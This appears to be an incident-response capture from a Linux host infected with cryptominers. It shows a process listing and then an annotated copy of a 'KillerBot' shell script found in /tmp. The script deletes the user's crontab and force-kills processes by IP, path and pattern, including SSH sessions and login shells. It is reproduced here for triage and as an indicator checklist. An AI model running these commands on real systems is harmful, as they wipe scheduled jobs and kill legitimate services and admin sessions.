usr1 27448 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 27479 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 27691 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 27699 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 27702 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 27705 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 27814 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 28307 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 28310 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 28551 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 28557 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 28991 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29056 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 29071 1 0 Apr24 ? 00:00:00 [ps] <defunct>
usr1 29072 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 29073 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 29074 1 0 Apr24 ? 00:00:00 [awk] <defunct>
usr1 29075 1 0 Apr24 ? 00:00:00 [xargs] <defunct>
usr1 29130 1 0 Apr19 ? 00:00:00 [ps] <defunct>
usr1 29131 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29132 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29133 1 0 Apr19 ? 00:00:00 [grep] <defunct>
usr1 29134 1 0 Apr19 ? 00:00:00 [awk] <defunct>
usr1 29135 1 0 Apr19 ? 00:00:00 [xargs] <defunct>
usr1 29345 1 0 Apr19 ? 00:00:00 [0] <defunct>
usr1 29347 1 0 Apr19 ? 00:00:05 [0] <defunct>
usr1 29356 1 0 Apr19 ? 00:00:00 [kerberods] <defunct>
usr1 29362 1 0 Apr19 ? 00:20:32 [kerberods] <defunct>
usr1 29411 1 78 Apr19 ? 7-11:37:01 [khugepageds] <defunct>
usr1 29696 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 29700 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 29724 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29727 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29730 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 29860 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30084 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30231 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 30252 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 30508 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 30514 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30516 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 30518 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30521 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 30571 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 31060 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 31171 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 31274 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 31277 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 31325 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 31581 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 31878 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 31997 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 32124 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 32364 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 32370 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32373 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32376 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32456 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 32507 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 32621 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 33114 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33117 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33120 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33318 1 0 Apr19 ? 00:00:51 [khugepageds] <defunct>
usr1 33476 1 0 Apr25 ? 00:00:00 [curl] <defunct>
usr1 33498 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33501 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33504 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33882 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33885 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 33888 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34190 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34194 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 34210 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34213 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34216 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34346 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34731 1 0 Apr19 ? 00:00:00 [0] <defunct>
usr1 34734 1 0 Apr19 ? 00:00:14 /usr/sbin/atd
usr1 34752 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 34885 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34888 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 34891 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35072 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 35175 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 35248 1 0 Apr25 ? 00:00:00 [curl] <defunct>
usr1 35255 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35258 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35261 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35328 1 0 Apr19 ? 01:48:49 [dblaunchs] <defunct>
usr1 35627 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35630 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35633 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35746 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35772 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 35775 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36171 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36174 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36417 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 36573 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36576 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 36579 1 0 Apr25 ? 00:00:00 [sh] <defunct>
usr1 37143 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37146 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37149 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37474 1 0 Apr26 ? 00:00:00 [rm] <defunct>
usr1 37486 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37489 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37815 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 37859 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37862 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37865 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 37980 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 38235 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38238 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38241 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 38596 1 0 Apr26 ? 00:00:00 [curl] <defunct>
usr1 38699 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 39063 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39066 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39113 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 39174 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 39445 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 39901 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39904 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 39907 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40037 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 40038 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40237 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40240 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40243 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40463 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 40487 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 40600 1 0 Apr26 ? 00:00:00 [curl] <defunct>
usr1 40638 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 40640 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40643 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40646 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40753 1 0 Apr19 ? 00:00:12 [khugepageds] <defunct>
usr1 40777 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40936 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40939 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 40942 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41043 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 41046 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41060 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41063 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41066 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41191 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 41197 1 0 Apr26 ? 00:00:00 [sh] <defunct>
usr1 41358 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41361 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41364 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41472 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41861 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41864 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 41867 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42189 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 42600 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42969 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42972 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 42975 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43105 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43215 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 43265 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43268 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43634 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 43637 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44003 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44006 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44009 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44183 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 44334 1 0 Apr27 ? 00:00:00 [xargs] <defunct>
usr1 44340 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44343 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44346 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 44470 1 0 Apr27 ? 00:00:00 [ps] <defunct>
usr1 44471 1 0 Apr27 ? 00:00:00 [sort] <defunct>
usr1 44472 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 44473 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 44474 1 0 Apr27 ? 00:00:00 [tail] <defunct>
usr1 44475 1 0 Apr27 ? 00:00:00 [awk] <defunct>
usr1 44476 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45433 1 0 Apr27 ? 00:00:00 [sleep] <defunct>
usr1 45435 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45525 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 45550 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 45722 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 45732 1 0 Apr27 ? 00:00:00 [ps] <defunct>
usr1 45733 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 45734 1 0 Apr27 ? 00:00:00 [grep] <defunct>
usr1 45735 1 0 Apr27 ? 00:00:00 [awk] <defunct>
usr1 45736 1 0 Apr27 ? 00:00:00 [xargs] <defunct>
usr1 45743 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45746 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 45749 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 46096 1 0 Apr27 ? 00:00:00 26d60ac947903dfcde79ac551c2ce777b
usr1 46097 1 0 Apr27 ? 00:00:00 [sleep] <defunct>
usr1 46098 46096 99 Apr27 ? 8-09:52:44
usr1 46115 1 0 Apr27 ? 00:00:00 [sh] <defunct>
usr1 46484 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46487 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46864 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46867 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46870 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46988 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 46998 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47001 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47004 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47134 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47293 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47296 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47299 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 47639 1 0 Apr28 ? 00:00:00 [whoami] <defunct>
usr1 47645 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48014 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48065 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 48071 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 48507 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 48758 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48761 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48764 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 48771 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 49068 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 49070 1 0 Apr19 ? 00:00:01 [khugepageds] <defunct>
usr1 49130 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 49251 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 49500 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 49503 1 0 Apr28 ? 00:00:00 [sh] <defunct>
usr1 50251 1 0 01:38 ? 00:00:00 [sh] <defunct>
usr1 50703 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 50869 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 50991 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 50994 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 50997 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 51121 1 0 05:26 ? 00:00:00 [ps] <defunct>
usr1 51122 1 0 05:26 ? 00:00:00 [sort] <defunct>
usr1 51123 1 0 05:26 ? 00:00:00 [grep] <defunct>
usr1 51124 1 0 05:26 ? 00:00:00 [grep] <defunct>
usr1 51125 1 0 05:26 ? 00:00:00 [tail] <defunct>
usr1 51126 1 0 05:26 ? 00:00:00 [awk] <defunct>
usr1 51127 1 0 05:26 ? 00:00:00 [sh] <defunct>
usr1 51286 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51289 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51292 1 0 06:32 ? 00:00:00 [sh] <defunct>
usr1 51576 1 0 06:32 ? 00:00:00 [ps] <defunct>
usr1 51577 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51578 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51579 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51580 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51581 1 0 06:32 ? 00:00:00 [grep] <defunct>
usr1 51582 1 0 06:32 ? 00:00:00 [awk] <defunct>
usr1 51583 1 0 06:32 ? 00:00:00 [sed] <defunct>
usr1 51584 1 0 06:32 ? 00:00:00 [xargs] <defunct>
usr1 51619 1 0 07:34 ? 00:00:00 ps -ef
usr1 51772 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 52537 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 53040 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 53585 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 53918 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 54081 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 55233 1 0 Apr13 ? 00:00:00 [kerberods] <defunct>
usr1 55238 1 0 Apr13 ? 00:02:24 [kerberods] <defunct>
usr1 55277 1 2 Apr13 ? 08:42:53 [khugepageds] <defunct>
usr1 55495 1 0 Apr14 ? 00:00:00 [kerberods] <defunct>
usr1 55500 1 0 Apr14 ? 00:13:45 [kerberods] <defunct>
usr1 55540 1 29 Apr14 ? 4-12:34:51 [khugepageds] <defunct>
usr1 56634 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 56800 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 56816 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 58259 1 0 Apr19 ? 00:00:06 [khugepageds] <defunct>
usr1 61065 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 61089 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 61970 1 0 Apr22 ? 00:00:00 [sh] <defunct>
usr1 62134 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 62246 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 62517 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 64376 1 0 Apr15 ? 00:00:00 [kerberods] <defunct>
usr1 64381 1 0 Apr15 ? 00:26:39 [kerberods] <defunct>
usr1 64430 1 99 Apr15 ? 24-19:52:10 [khugepageds] <defunct>
usr1 65101 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 65164 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 65442 1 0 Apr19 ? 00:00:47 [khugepageds] <defunct>
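fk_bot
- the "KillerBot" from the /tmp listing above: a shell-script that removes other miners (crontabs, processes, files) in an endless loop
- its rules are broad and also hit legitimate processes (sshd sessions, perl, anything non-root above 10% cpu), so expect collateral damage on the host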
cat /tmp/fk
#!/bin/sh
# [analyst] Lines marked "[analyst]" are review annotations and are not part of
# the captured sample; every other line is reproduced unchanged.
# [analyst] KILLER: one pass of the clean-up routine. It takes no arguments and
# (1) removes the calling user's crontab, (2) sends SIGKILL to processes
# selected by string match on the process list, by connection to two remote
# addresses and by pgrep/pkill patterns, (3) deletes a long list of files and
# (4) creates /tmp/lok and the directory /tmp/khugepageds.
# The matched strings (addresses, pool hostnames, file names, base64
# fragments) appear to belong to other miner/bot campaigns, so the list is
# also usable as an IoC checklist when triaging a host.
KILLER() {
# [analyst] Crontab section. `crontab -r` does not read stdin: each of these
# lines removes the calling user's whole crontab, whether or not grep matched.
# Legitimate cron jobs of that user are lost together with malicious ones.
crontab -l | grep '192.99.142.226\|82.146.58.234\|83.220.169.247\|91.201.42.5' | crontab -r
crontab -l | grep 'pastebin.com' | crontab -r
crontab -l | grep 'gitee.com' | crontab -r
crontab -l | grep '107.174.47.156' | crontab -r
crontab -l | grep '83.220.169.24' | crontab -r
crontab -l | grep '51.38.203.146' | crontab -r
crontab -l | grep 'mr.sh' | crontab -r
crontab -l | grep '2mr.sh' | crontab -r
crontab -l | grep 'cr5.sh' | crontab -r
crontab -l | grep 'logo9.jpg' | crontab -r
# [analyst] Process section. Each line kills (-9) every PID whose `ps aux` line
# contains the given string: addresses, /tmp paths, short random-looking ids,
# look-alike daemon names. The match is on the whole line, so an unrelated
# process that merely mentions one of the strings is killed as well.
ps aux | grep '192.99.142.226\|82.146.58.234\|83.220.169.247\|51.68.173.240\|91.201.42.5' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kworkerdssx -c\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/65ccEJ7\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/jmxx\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/2Ne80nA\' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '45.76.122.92'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.38.191.178'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.15.56.161'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '86s.jpg'| awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep 'pastebin.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'aGTSGJJp'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nMrfmnRa'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'PuNY5tm2'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'I0r8Jyyt'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AgdgACUD'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'uiZvwxG8'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'hahwNEdB'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'BtwXn5qH'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '3XEzey2T'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 't2tKrCSZ'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'HD7fcBgg'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'zXcDajSs'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '3lmigMo'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AkMK4A2'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'AJ2AkKe'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'HiPxCJRS'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC030'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC031'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC032'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'http_0xCC033'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "C4iLM4L"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'aziplcr72qjhzvin'| awk '{print $2}' | xargs kill -9
# [analyst] Generic rule: kills any process whose command ($11) and first
# argument ($12) both start with "./".
ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs kill -9
ps aux | grep -v grep | grep '/boot/vmlinuz'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "i4b503a52cc5"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "2g0uv7npuhrlatd"| awk '{print $2}'|xargs kill -9
ps aux | grep -v grep | grep "nqscheduler"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "rkebbwgqpl4npmm"| awk '{print $2}'| xargs kill -9
# [analyst] Generic rule: kills any process whose ps line contains "]" and
# whose %CPU column ($3) is above 10.0.
ps aux | grep -v grep | grep -v aux |grep "]"| awk '$3>10.0{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "0kwti6ut420t"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm"| awk '{print $2}'| xargs kill -9
# [analyst] Generic rule: on lines containing none of "/", "-" and "_", kills
# processes whose command field ($11) is longer than 19 characters.
ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs kill -9
ps aux | grep -v grep | grep "\[^" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "rsync" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep " \["|grep watchbog| awk '{print $2}'| xargs kill -9
#ps aux | grep -v grep | grep " \["|grep bash| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "158.69.133.18:8220"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'gitee.com'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '104.248.4.162'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '89.35.39.78'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '104.248.53.213'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/dev/shm/z3.sh'| awk '{print $2}' | xargs kill -9
#ps aux | grep -v grep | grep '/bin/bash'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '\['|grep 'conflue'| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'netdns' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}'| xargs kill -9
# [analyst] Broad rules with collateral damage on a production host:
#   - any process above 10% CPU whose ps line contains neither "root" nor one
#     of the few excluded names (dblaunch*, apache2, atd);
#   - every "-bash" login shell;
#   - every sshd line that does not contain "bin" (NOTE(review): likely the
#     per-session "sshd: user" processes, i.e. open SSH sessions - confirm);
#   - every line containing " ps".
# Unexplained service restarts or dropped admin sessions on an affected host
# are consistent with these lines.
ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd |awk '$3>10.0{print $2}' | xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "\-bash"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v bin| grep sshd| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux | grep " ps"| awk '{print $2}'| xargs kill -9
# [analyst] The next two lines take the PID by character position (cut -c 9-15)
# instead of by awk field.
ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "x]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "x]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep "sh] <"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep -v aux |grep " \[]"| awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep '/tmp/l.sh'| awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'kblockd' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'khugepageds' | awk '{print $2}'| xargs kill -9
ps aux | grep -v grep | grep 'kerberods' | awk '{print $2}' | xargs kill -9
